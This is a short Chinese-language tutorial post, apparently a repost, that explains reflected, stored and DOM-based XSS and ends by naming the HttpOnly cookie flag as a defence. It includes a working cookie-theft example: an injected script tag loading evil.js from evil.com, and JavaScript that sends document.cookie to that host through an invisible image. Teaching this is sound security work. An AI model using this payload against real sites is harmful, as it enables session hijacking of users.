码迷,mamicode.com
首页 > 其他好文 > 详细

XSS(Cross Site Script)

时间:2019-03-29 11:46:38      阅读:124      评论:0      收藏:0      [点我收藏+]

标签:.com   div   ase   图片   body   cookie   cross   doc   str   

类型一:反射型XSS

简单地把用户输入的数据“反射”给浏览器。也就是说,黑客需要诱使用户“点击”一个恶意链接,才能攻击成功。

类型二:存储型XSS

把用户输入的数据“存储”在服务器端。这种XSS具有很强的稳定性。

类型三:DOM Based XSS

通过修改页面DOM节点形成的XSS,称之为DOM Based XSS。

 

XSS Payload:

XSS攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些完成各种具体功能的恶意脚本,被称为”XSS Payload“。

XSS Payload实际上就是JavaScript脚本。

 

Cookie劫持案例:

http://www.a.com/test.htm?abc="><script src=http://www.evil.com/evil.js></script>

Payload写在这个远程脚本中,避免直接在URL的参数里写入大量的JavaScript代码。在evil.js中,可通过如下代码窃取Cookie:

var img = document.createElement("img");
img.src = "http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);

这段代码在页面插入了一张看不见的图片,同时把document.cookie对象作为参数发送到远程服务器。

Cookie的”HttpOnly“标识可以防止”Cookie劫持“。

 

XSS(Cross Site Script)

标签:.com   div   ase   图片   body   cookie   cross   doc   str   

原文地址:https://www.cnblogs.com/lwfiwo/p/10620219.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!